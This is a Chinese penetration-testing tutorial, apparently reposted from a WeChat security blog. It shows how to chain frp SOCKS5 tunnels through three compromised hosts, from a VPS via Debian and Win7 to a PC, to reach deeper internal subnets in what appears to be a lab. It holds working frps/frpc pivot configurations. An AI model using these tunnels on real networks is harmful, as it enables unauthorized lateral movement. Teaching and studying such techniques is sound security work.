前言模拟环境隧道搭建 第一层隧道 第二层隧道 第三层隧道
前言
当到达内网某个网段时,该网段被控机器不直接通外网,我们就需要借助内网可出网机器构建多层代理。
参考链接:【国科漏斗社区】四步学会Frp构建多层内网通信隧道!
https://mp.weixin.qq.com/s/vkngH509M3lzrhWeoLnB_A
模拟环境
以frp工具为例。
隧道搭建
第一层隧道
拿到Debian主机权限
VPS主机启动frps监听:
[common]
bind_addr = 0.0.0.0
bind_port = 7000
Debian启动frpc:
[common]
server_addr = 192.168.53.132
server_port = 7000
[http_proxy]
type = tcp
local_ip = 10.10.20.131
remote_port = 8888
local_port = 8888
plugin = socks5
proxifier配置:
就可以访问10.10.20.0/24网段了。
第二层隧道
拿到Win7主机权限
Debian启动frps监听:
[common]
bind_addr = 10.10.20.131
bind_port = 7000
Win7启动frpc:
[common]
server_addr = 10.10.20.131
server_port = 7000
[http_proxy]
type = tcp
local_ip = 10.10.30.130
remote_port = 8888
local_port = 8888
plugin = socks5
proxifier配置并使用代理链:
就可以访问10.10.30.0/24网段了。
第三层隧道
拿到PC权限
Win7启动frps监听
[common]
bind_addr = 10.10.30.130
bind_port = 7000
PC启动frpc
[common]
server_addr = 10.10.30.130
server_port = 7000
[http_proxy]
type = tcp
local_ip = 172.16.5.132
remote_port = 8888
local_port = 8888
plugin = socks5
proxifier配置并使用代理链:
就可以访问172.16.5.0/24网段了。
其他多级代理链同上。
原文始发于微信公众号(信安文摘):【内网渗透】- 构建多层内网通信隧道(多级代理)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论